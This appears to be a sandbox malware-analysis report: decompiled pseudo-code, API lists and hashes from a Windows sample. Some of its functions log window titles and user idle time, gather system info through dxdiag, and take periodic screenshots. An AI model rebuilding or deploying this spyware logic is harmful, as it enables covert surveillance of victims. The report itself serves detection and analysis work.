                              										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
                              									}
                              								}
                              								_t143 = _v44;
                              								 *_t143 = 1;
                              								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                              								 *_t215 = _v60;
                              								 *(_t215 + 0x90) = _v32;
                              								 *(_t215 + 0x94) = _v68;
                              								 *(_t215 + 0x98) = _v56;
                              								 *(_t215 + 4) = _v48;
                              								L37:
                              								L0043EE85(_v52);
                              								goto L41;
                              							} else {
                              								_t189 =  &_v21;
                              								while(1) {
                              									_t160 =  *_t189;
                              									if(_t160 == 0) {
                              										break;
                              									}
                              									_t216 =  *(_t189 - 1) & 0x000000ff;
                              									if(_t216 > (_t160 & 0x000000ff)) {
                              										L30:
                              										_t189 =  &(_t189[2]);
                              										if( *(_t189 - 1) != _t170) {
                              											continue;
                              										}
                              										break;
                              									}
                              									_t209 = _t193 + 0x100 + _t216 * 2;
                              									do {
                              										_t216 = _t216 + 1;
                              										 *_t209 = 0x8000;
                              										_t209 = _t209 + 2;
                              									} while (_t216 <= ( *_t189 & 0x000000ff));
                              									goto L30;
                              								}
                              								goto L32;
                              							}
                              						} else {
                              							_t190 =  &_v21;
                              							while(1) {
                              								_t165 =  *_t190;
                              								if(_t165 == 0) {
                              									goto L22;
                              								}
                              								_t192 =  *(_t190 - 1) & 0x000000ff;
                              								_t166 = _t165 & 0x000000ff;
                              								while(_t192 <= _t166) {
                              									 *((char*)(_t192 + _t197)) = 0x20;
                              									_t192 = _t192 + 1;
                              									__eflags = _t192;
                              									_t166 =  *_t190 & 0x000000ff;
                              								}
                              								_t190 =  &(_t190[2]);
                              								_t242 =  *(_t190 - 1) - _t170;
                              								if( *(_t190 - 1) != _t170) {
                              									continue;
                              								}
                              								goto L22;
                              							}
                              							goto L22;
                              						}
                              					}
                              				}
                              				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                              				_t219 = _t218 + 0x14;
                              				if(_t168 != 0) {
                              					goto L36;
                              				}
                              				goto L3;
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
                              • Opcode Fuzzy Hash: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004480F6(intOrPtr _a4) {
                              				intOrPtr _v8;
                              				intOrPtr _t25;
                              				intOrPtr* _t26;
                              				intOrPtr _t28;
                              				intOrPtr* _t29;
                              				intOrPtr* _t31;
                              				intOrPtr* _t45;
                              				intOrPtr* _t46;
                              				intOrPtr* _t47;
                              				intOrPtr* _t55;
                              				intOrPtr* _t70;
                              				intOrPtr _t74;
                              
                              				_t74 = _a4;
                              				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                              				if(_t25 != 0 && _t25 != 0x46a188) {
                              					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                              					if(_t45 != 0 &&  *_t45 == 0) {
                              						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                              						if(_t46 != 0 &&  *_t46 == 0) {
                              							L0043EE85(_t46);
                              							E00447332( *((intOrPtr*)(_t74 + 0x88)));
                              						}
                              						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                              						if(_t47 != 0 &&  *_t47 == 0) {
                              							L0043EE85(_t47);
                              							L004477EC( *((intOrPtr*)(_t74 + 0x88)));
                              						}
                              						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
                              						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
                              					}
                              				}
                              				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                              				if(_t26 != 0 &&  *_t26 == 0) {
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                              					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
                              				}
                              				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
                              				_t28 = 6;
                              				_t16 = _t74 + 0xa0; // 0xa0
                              				_t55 = _t16;
                              				_v8 = _t28;
                              				_t18 = _t74 + 0x28; // 0x28
                              				_t70 = _t18;
                              				do {
                              					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
                              						_t31 =  *_t70;
                              						if(_t31 != 0 &&  *_t31 == 0) {
                              							L0043EE85(_t31);
                              							L0043EE85( *_t55);
                              						}
                              						_t28 = _v8;
                              					}
                              					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                              						_t29 =  *((intOrPtr*)(_t70 - 4));
                              						if(_t29 != 0 &&  *_t29 == 0) {
                              							L0043EE85(_t29);
                              						}
                              						_t28 = _v8;
                              					}
                              					_t55 = _t55 + 4;
                              					_t70 = _t70 + 0x10;
                              					_t28 = _t28 - 1;
                              					_v8 = _t28;
                              				} while (_t28 != 0);
                              				return L0043EE85(_t74);
                              			}

                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 0044813A
                                • Part of subcall function 00447332: _free.LIBCMT ref: 0044734F
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447361
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447373
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447385
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447397
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473A9
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473BB
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473CD
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473DF
                                • Part of subcall function 00447332: _free.LIBCMT ref: 004473F1
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447403
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447415
                                • Part of subcall function 00447332: _free.LIBCMT ref: 00447427
                              • _free.LIBCMT ref: 0044812F
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD
                              • _free.LIBCMT ref: 00448151
                              • _free.LIBCMT ref: 00448166
                              • _free.LIBCMT ref: 00448171
                              • _free.LIBCMT ref: 00448193
                              • _free.LIBCMT ref: 004481A6
                              • _free.LIBCMT ref: 004481B4
                              • _free.LIBCMT ref: 004481BF
                              • _free.LIBCMT ref: 004481F7
                              • _free.LIBCMT ref: 004481FE
                              • _free.LIBCMT ref: 0044821B
                              • _free.LIBCMT ref: 00448233
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction ID: a56d3d2c39c59f1f27121bff60bdf2851450fdc6f924b8cf5ee19873ea009e99
                              • Opcode Fuzzy Hash: 8b17bf4bcecabb647019a779e3dd08f50c7c3410c3c01fd7615392e0bfe9a2e3
                              • Instruction Fuzzy Hash: 1F318B316007019FEF20AA7AD846B5BB3E8EF45754F10495FE068E7291DF78AC46CB18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00409197(void* __ecx, void* __edx) {
                              				char _v28;
                              				char _v56;
                              				char _v76;
                              				char _v80;
                              				char _v100;
                              				void* _v104;
                              				char _v108;
                              				char _v112;
                              				struct HWND__* _v116;
                              				void* __ebx;
                              				void* __edi;
                              				int _t36;
                              				struct HWND__* _t42;
                              				void* _t50;
                              				int _t57;
                              				struct HWND__* _t77;
                              				void* _t119;
                              				signed int _t125;
                              				void* _t127;
                              
                              				_t112 = __edx;
                              				_t127 = (_t125 & 0xfffffff8) - 0x74;
                              				_push(_t77);
                              				_push(0xea60);
                              				_t119 = __ecx;
                              				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                              					Sleep(0x1f4);
                              					_t77 = GetForegroundWindow();
                              					_t36 = GetWindowTextLengthW(_t77);
                              					_t4 = _t36 + 1; // 0x1
                              					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
                              					if(_t36 != 0) {
                              						_t57 = L00402469();
                              						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
                              						_t112 = 0x46dcf4;
                              						if(L00409EAE(0x46dcf4) == 0) {
                              							L00409DD4(0x46dcf4,  &_v100);
                              							E00407341(L00402469() - 1);
                              							_t127 = _t127 - 0x18;
                              							_t136 =  *0x46c39b;
                              							if( *0x46c39b == 0) {
                              								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
                              								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                              								L00408B82(_t119);
                              								L00401ED0();
                              							} else {
                              								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
                              								L00409636(_t77, _t119, _t136);
                              							}
                              						}
                              					}
                              					_t83 = _t119;
                              					L00409C17(_t119);
                              					if(L00416B2E(_t119) < 0xea60) {
                              						L18:
                              						L00401ED0();
                              						continue;
                              					} else {
                              						_t77 = _v116;
                              						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                              							_t42 = L00416B2E(_t83);
                              							if(_t42 < 0xea60) {
                              								__eflags = _t77 % 0xea60;
                              								L0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
                              								_t50 = E0040530D(_t77,  &_v80, L004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                              								_t127 = _t127 + 0xc - 0x14;
                              								_t112 = _t50;
                              								L00416C32(_t127, _t50);
                              								L00408B82(_t119);
                              								L00401FA7();
                              								L00401FA7();
                              								L00401FA7();
                              								goto L18;
                              							}
                              							_t77 = _t42;
                              							_v116 = _t77;
                              							Sleep(0x3e8);
                              						}
                              						L00401ED0();
                              						break;
                              					}
                              				}
                              				__eflags = 0;
                              				return 0;
                               			}

                               Instruction addresses (decompiler address column, in listing order): 0x00409197, 0x0040919d, 0x004091a0, 0x004091a1, 0x004091a3, 0x004091a5, 0x00409204, 0x00409210, 0x00409213, 0x0040921d, 0x00409225, 0x0040922c, 0x00409236, 0x00409247, 0x0040924d, 0x0040925d, 0x00409269, 0x0040927d, 0x00409282, 0x00409289, 0x00409290, 0x004092ba, 0x004092be, 0x004092c6, 0x004092cf, 0x00409292, 0x00409295, 0x0040929c, 0x0040929c, 0x00409290, 0x0040925d, 0x004092d4, 0x004092d6, 0x004092e7, 0x0040938f, 0x00409393, 0x00000000, 0x004092ed, 0x004092ed, 0x004092f1, 0x00409301, 0x00409308, 0x00409328, 0x0040932b, 0x0040935c, 0x00409361, 0x00409364, 0x00409368, 0x0040936f, 0x00409378, 0x00409381, 0x0040938a, 0x00000000, 0x0040938a, 0x0040930a, 0x00409311, 0x00409315, 0x00409315, 0x004093a1, 0x00000000, 0x004093a1, 0x004092e7, 0x004093a8, 0x004093ae

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004091F9
                              • Sleep.KERNEL32(000001F4), ref: 00409204
                              • GetForegroundWindow.USER32 ref: 0040920A
                              • GetWindowTextLengthW.USER32(00000000), ref: 00409213
                              • GetWindowTextW.USER32 ref: 00409247
                              • Sleep.KERNEL32(000003E8), ref: 00409315
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                                • Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 107669343-3343415809
                              • Opcode ID: 8ef25fe324020487e23ec3656bc125fa0763a2f62380acee8a23ca220aecaf57
                              • Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
                              • Opcode Fuzzy Hash: 8ef25fe324020487e23ec3656bc125fa0763a2f62380acee8a23ca220aecaf57
                              • Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DecodePointer
                              • String ID: acos$asin$exp$log$log10$pow$sqrt$@
                              • API String ID: 3527080286-3098891844
                              • Opcode ID: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
                              • Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
                              • Opcode Fuzzy Hash: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
                              • Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00413012(void* __ecx, void* __eflags, char _a4) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v180;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t35;
                              				void* _t46;
                              				void* _t54;
                              				void* _t55;
                              				void* _t90;
                              				void* _t92;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t97 = __eflags;
                              				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
                              				L00401ED0();
                              				_t55 = 0;
                              				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
                              				L00401ED0();
                              				E004020B5(0,  &_v28);
                              				_t92 = 0;
                              				do {
                              					_t35 = L00401ECB( &_v76);
                              					_t87 =  &_v28;
                              					E00417334(_t35,  &_v28);
                              					Sleep(0x64);
                              					_t92 = _t92 + 1;
                              				} while (L00409DB7() != 0 && _t92 < 0x4b0);
                              				if(L00409DB7() == 0) {
                              					DeleteFileW(L00401ECB( &_v76));
                              					L00404818(_t55,  &_v180, 1);
                              					_t95 = _t94 - 0x10;
                              					_t93 = 0x46bacc;
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					_t46 = L004049D2(_t87);
                              					_t102 = _t46;
                              					if(_t46 != 0) {
                              						_t93 = _t95 - 0x18;
                              						_t16 =  &_a4; // 0x412c62
                              						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52, _t16, 0x46c238), _t102,  &_v28);
                              						_push(0x97);
                              						L00404A6E(_t55,  &_v180, _t49, _t102);
                              						L00401FA7();
                              						L00404DD5( &_v180);
                              						_t55 = 1;
                              					}
                              					L00404DF9(_t55,  &_v180, _t93);
                              				}
                              				L00401FA7();
                              				L00401ED0();
                              				L00401FA7();
                              				return _t55;
                               			}

                               Instruction addresses (decompiler address column, in listing order): 0x00413012, 0x0041303c, 0x00413045, 0x0041304a, 0x00413073, 0x0041307c, 0x00413084, 0x00413089, 0x0041308b, 0x0041308e, 0x00413093, 0x00413098, 0x0041309f, 0x004130a8, 0x004130ae, 0x004130c4, 0x004130d3, 0x004130e1, 0x004130e6, 0x004130f1, 0x004130f6, 0x004130f7, 0x004130f8, 0x004130f9, 0x004130fa, 0x004130ff, 0x00413101, 0x00413109, 0x0041310b, 0x00413121, 0x00413127, 0x00413132, 0x0041313a, 0x00413145, 0x0041314a, 0x0041314a, 0x00413152, 0x00413152, 0x0041315a, 0x00413162, 0x0041316a, 0x00413177

                              APIs
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • Sleep.KERNEL32(00000064), ref: 0041309F
                              • DeleteFileW.KERNEL32(00000000), ref: 004130D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                              • String ID: /t $\sysinfo.txt$b,A$dxdiag$open$temp
                              • API String ID: 2701014334-3646109375
                              • Opcode ID: 06a9efe08f1e71f62d430d38452395e7d8c1355bfafde8ad9fbb57586f9eb49e
                              • Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
                              • Opcode Fuzzy Hash: 06a9efe08f1e71f62d430d38452395e7d8c1355bfafde8ad9fbb57586f9eb49e
                              • Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E004152D7() {
                              				intOrPtr* _t42;
                              				void* _t45;
                              				char* _t54;
                              				void* _t72;
                              				long _t78;
                              				void* _t83;
                              				struct _SECURITY_ATTRIBUTES* _t85;
                              				struct _SECURITY_ATTRIBUTES* _t92;
                              				void* _t131;
                              				void* _t132;
                              				void* _t140;
                              				void* _t141;
                              				void* _t146;
                              				intOrPtr _t147;
                              				void* _t148;
                              				void* _t149;
                              				void* _t150;
                              
                              				L00450918(0x451ece, _t146);
                              				_push(_t141);
                              				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                              				_t92 = 0;
                              				 *((intOrPtr*)(_t146 - 4)) = 0;
                              				_t149 =  *0x46bea0 - _t92; // 0x0
                              				if(_t149 == 0) {
                              					_t147 = _t147 - 0xc;
                              					_t131 = _t146 - 0x68;
                              					L00413D5E(_t131);
                              					__imp__GdiplusStartup(0x46bea0, _t131, 0);
                              				}
                              				_t150 =  *0x46bd70 - _t92; // 0x0
                              				if(_t150 == 0) {
                              					L00401EDA(0x46c880, _t132, _t141, L0041481D(_t146 - 0x40));
                              					L00401ED0();
                              				}
                              				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
                              				_t45 = L00401ECB(L00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
                              				_t134 =  *_t42;
                              				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
                              				L00401ED0();
                              				L00401ED0();
                              				CreateDirectoryW(L00401ECB(0x46c868), _t92);
                              				L00401F4D(_t92, _t146 - 0xb0);
                              				L00401F4D(_t92, _t146 - 0x80);
                              				 *(_t146 - 0x11) = _t92;
                              				 *0x46bd6b = 1;
                              				_t54 =  *((intOrPtr*)(_t146 + 8));
                              				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                              				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                              				_t140 = Sleep;
                              				L5:
                              				while(1) {
                              					if( *_t54 != 1) {
                              						L10:
                              						GetLocalTime(_t146 - 0x28);
                              						_push( *(_t146 - 0x1c) & 0x0000ffff);
                              						_push( *(_t146 - 0x1e) & 0x0000ffff);
                              						_push( *(_t146 - 0x20) & 0x0000ffff);
                              						_push( *(_t146 - 0x22) & 0x0000ffff);
                              						_push( *(_t146 - 0x26) & 0x0000ffff);
                              						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                              						_t147 = _t147 + 0x20;
                              						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, L00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
                              						L00401ED0();
                              						L00401ED0();
                              						L00401ED0();
                              						_t72 = L00401ECB(_t146 - 0x80);
                              						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                              						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                              						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                              						if(__eflags != 0) {
                              							_t92 = 0;
                              							 *(_t146 - 0x11) = 0;
                              							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8;
                              							__eflags = _t78;
                              						} else {
                              							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60;
                              						}
                              						Sleep(_t78);
                              						_t54 =  *((intOrPtr*)(_t146 + 8));
                              						continue;
                              					}
                              					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                              					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                              					while(1) {
                              						_t153 = _t92;
                              						if(_t92 != 0) {
                              							goto L10;
                              						}
                              						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
                              						_t148 = _t147 - 0x18;
                              						E0040425F(_t92, _t148, _t83);
                              						_t85 = L00417417(0, _t134);
                              						_t147 = _t148 + 0x18;
                              						_t92 = _t85;
                              						 *(_t146 - 0x11) = _t92;
                              						if(_t92 != 0) {
                              							goto L10;
                              						}
                              						Sleep(0x3e8);
                              					}
                              					goto L10;
                              				}
                               			}

                               Instruction addresses (decompiler address column, in listing order): 0x004152dc, 0x004152e8, 0x004152ea, 0x004152ed, 0x004152ef, 0x004152f2, 0x004152f8, 0x004152fa, 0x004152fd, 0x00415300, 0x0041530e, 0x0041530e, 0x00415314, 0x0041531a, 0x0041532a, 0x00415332, 0x00415332, 0x00415347, 0x00415363, 0x00415369, 0x0041537c, 0x00415384, 0x0041538c, 0x0041539a, 0x004153a6, 0x004153ae, 0x004153b3, 0x004153b6, 0x004153c7, 0x004153cd, 0x004153d0, 0x004153d3, 0x00000000, 0x004153d9, 0x004153dc, 0x00415424, 0x00415428, 0x00415432, 0x00415437, 0x0041543c, 0x00415441, 0x00415446, 0x00415454, 0x00415459, 0x00415498, 0x004154a0, 0x004154a8, 0x004154b3, 0x004154bb, 0x004154c3, 0x004154c8, 0x004154d5, 0x004154d8, 0x004154f6, 0x004154f8, 0x0041550f, 0x0041550f, 0x004154da, 0x004154ee, 0x004154ee, 0x00415517, 0x00415519, 0x00000000, 0x00415519, 0x004153de, 0x004153e3, 0x004153e6, 0x004153e6, 0x004153e8, 0x00000000, 0x00000000, 0x004153f8, 0x004153fd, 0x00415403, 0x0041540a, 0x0041540f, 0x00415412, 0x00415414, 0x00415419, 0x00000000, 0x00000000, 0x00415420, 0x00415420, 0x00000000, 0x004153e6

                              APIs
                              • __EH_prolog.LIBCMT ref: 004152DC
                              • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                                • Part of subcall function 0041510D: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166
                                • Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
                              • Sleep.KERNEL32(000003E8), ref: 00415420
                              • GetLocalTime.KERNEL32(?), ref: 00415428
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimechar_traits
                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 3280235481-3790400642
                              • Opcode ID: 38ebd0105778573f40249f35b2c97ab44ec1ff7730162a3710061e6861f9b870
                              • Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
                              • Opcode Fuzzy Hash: 38ebd0105778573f40249f35b2c97ab44ec1ff7730162a3710061e6861f9b870
                              • Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
                              				signed int _v5;
                              				char _v6;
                              				void* _v12;
                              				unsigned int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				void* _v32;
                              				long _v36;
                              				void* _v40;
                              				long _v44;
                              				signed int* _t143;
                              				signed int _t145;
                              				intOrPtr _t149;
                              				signed int _t153;
                              				signed int _t155;
                              				signed char _t157;
                              				unsigned int _t158;
                              				intOrPtr _t162;
                              				void* _t163;
                              				signed int _t164;
                              				signed int _t167;
                              				long _t168;
                              				intOrPtr _t175;
                              				signed int _t176;
                              				intOrPtr _t178;
                              				signed int _t180;
                              				signed int _t184;
                              				char _t191;
                              				char* _t192;
                              				char _t199;
                              				char* _t200;
                              				signed char _t211;
                              				signed int _t213;
                              				long _t215;
                              				signed int _t216;
                              				char _t218;
                              				signed char _t222;
                              				signed int _t223;
                              				unsigned int _t224;
                              				intOrPtr _t225;
                              				unsigned int _t229;
                              				signed int _t231;
                              				signed int _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				signed int _t235;
                              				signed char _t236;
                              				signed int _t237;
                              				signed int _t239;
                              				signed int _t240;
                              				signed int _t241;
                              				signed int _t242;
                              				signed int _t246;
                              				void* _t248;
                              				void* _t249;
                              
                              				_t213 = _a4;
                              				if(_t213 != 0xfffffffe) {
                              					__eflags = _t213;
                              					if(_t213 < 0) {
                              						L58:
                              						_t143 = L00439E01();
                              						 *_t143 =  *_t143 & 0x00000000;
                              						__eflags =  *_t143;
                              						 *((intOrPtr*)(L00439E14())) = 9;
                              						L59:
                              						_t145 = E0043626D();
                              						goto L60;
                              					}
                              					__eflags = _t213 -  *0x46ba00; // 0x40
                              					if(__eflags >= 0) {
                              						goto L58;
                              					}
                              					_v24 = 1;
                              					_t239 = _t213 >> 6;
                              					_t235 = (_t213 & 0x0000003f) * 0x30;
                              					_v20 = _t239;
                              					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                              					_v28 = _t235;
                              					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                              					_v5 = _t222;
                              					__eflags = _t222 & 0x00000001;
                              					if((_t222 & 0x00000001) == 0) {
                              						goto L58;
                              					}
                              					_t223 = _a12;
                              					__eflags = _t223 - 0x7fffffff;
                              					if(_t223 <= 0x7fffffff) {
                              						__eflags = _t223;
                              						if(_t223 == 0) {
                              							L57:
                              							return 0;
                              						}
                              						__eflags = _v5 & 0x00000002;
                              						if((_v5 & 0x00000002) != 0) {
                              							goto L57;
                              						}
                              						__eflags = _a8;
                              						if(_a8 == 0) {
                              							goto L6;
                              						}
                              						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                              						_v5 = _t153;
                              						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                              						_t246 = 0;
                              						_t155 = _t153 - 1;
                              						__eflags = _t155;
                              						if(_t155 == 0) {
                              							_t236 = _v24;
                              							_t157 =  !_t223;
                              							__eflags = _t236 & _t157;
                              							if((_t236 & _t157) != 0) {
                              								_t158 = 4;
                              								_t224 = _t223 >> 1;
                              								_v16 = _t158;
                              								__eflags = _t224 - _t158;
                              								if(_t224 >= _t158) {
                              									_t158 = _t224;
                              									_v16 = _t224;
                              								}
                              								_t246 = L0043E61D(_t224, _t158);
                              								L0043EE85(0);
                              								L0043EE85(0);
                              								_t249 = _t248 + 0xc;
                              								_v12 = _t246;
                              								__eflags = _t246;
